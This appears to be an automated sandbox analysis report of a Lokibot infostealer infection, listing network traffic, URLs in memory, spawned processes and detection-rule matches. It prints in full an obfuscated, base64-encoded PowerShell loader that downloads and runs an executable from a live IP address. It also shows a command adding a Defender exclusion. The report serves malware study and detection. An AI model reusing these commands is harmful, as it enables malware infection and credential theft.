            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:58:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:59:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 20 Nov 2024 09:59:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
            Source: powershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.e
            Source: powershell.exe, 00000001.00000002.1809011677.000000000307F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exe
            Source: powershell.exe, 00000001.00000002.1825901541.000000000787F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exe-LMEMH
            Source: powershell.exe, 00000001.00000002.1825901541.000000000781F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/33/caspol.exeC:
            Source: powershell.exe, 00000001.00000002.1825901541.000000000787F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.231/chedvmbusRFCOMMP
            Source: svchost.exe, 00000007.00000002.2883796438.0000024C1B400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B24D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: edb.log.7.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
            Source: powershell.exe, 00000001.00000002.1823008559.0000000005D67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.1813801603.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701805995.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000006.00000002.1795089364.0000000002561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1704999320.0000000007B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: wininit.exe, wininit.exe, 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: powershell.exe, 00000003.00000002.1704693540.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
            Source: powershell.exe, 00000003.00000002.1704693540.0000000007AF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: wininit.exe, 00000006.00000002.1803017668.0000000006692000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: powershell.exe, 00000001.00000002.1813801603.0000000004D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701805995.00000000053B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBiq
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
            Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
            Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
            Source: edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B2C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.7.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
            Source: powershell.exe, 00000003.00000002.1701805995.0000000005506000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1704999320.0000000007B60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.1813801603.0000000004E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.1825901541.00000000077D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/W
            Source: powershell.exe, 00000001.00000002.1823008559.0000000005D67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1703477711.0000000006417000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: svchost.exe, 00000007.00000003.1771055791.0000024C1B2C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
            Source: edb.log.7.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
            Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.wininit.exe.3709200.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.wininit.exe.36ef1e0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 9.2.wininit.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
